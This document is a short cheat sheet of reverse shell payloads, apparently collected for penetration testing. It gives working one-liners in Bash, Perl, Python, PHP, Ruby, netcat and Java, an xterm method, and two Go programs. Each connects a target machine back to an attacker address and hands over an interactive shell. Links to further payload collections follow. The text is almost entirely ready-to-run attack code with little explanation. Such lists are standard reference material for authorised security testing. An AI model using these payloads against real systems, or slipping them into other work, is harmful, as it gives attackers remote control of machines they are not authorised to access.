Som notes on shells and reverse shells
Bash
bash -i >& /dev/tcp/10.0.0.52/1234 0>&1
PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'There’s also an alternative PERL revere shell here.
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 1234If you have the wrong version of netcat installed,
you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()[Untested submission from anonymous reader]
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
GO Reverse shell
https://github.com/sathish09/rev2go
https://blog.jan0ski.net/golang/rev-shell.html
package main
import (
"bufio"
"fmt"
"net"
"os/exec"
"strings"
)
func main() {
conn, _ := net.Dial("tcp", "10.1.75.200:8081")
for {
message, _ := bufio.NewReader(conn).ReadString('\n')
out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
if err != nil {
fmt.Fprintf(conn, "%s\n",err)
}
fmt.Fprintf(conn, "%s\n",out)
}
}
Go - Advanced shell$ GOOS=$target_os GOARCH=$target_arch go build reverse_shell.gopackage main
import (
"net"
"os/exec"
"runtime"
)
func main() {
// Establish connection to attacking host
conn, err := net.Dial("tcp", "127.0.0.1:443")
if err != nil {
panic(err)
}
// Determine which shell to use
var shell string
switch runtime.GOOS {
case "windows":
shell = "cmd.exe"
case "linux":
shell = "/bin/sh"
case "darwin":
shell = "/bin/bash"
}
// Run shell command, pointing file descriptors to remote connection
cmd := exec.Command(shell)
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()
}
Online resources
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://highon.coffee/blog/reverse-shell-cheat-sheet/
https://golangexample.com/one-liner-reverse-shell-generator/
https://golangexample.com/girsh-golang-interactive-reverse-shell/
https://golangexample.com/reverse-shell-over-tls-in-golang/
https://golangexample.com/go-encrypted-reverse-tcp-shell/
https://golangexample.com/statically-linked-ssh-server-with-reverse-shell-functionality-for-ctfs-and-such/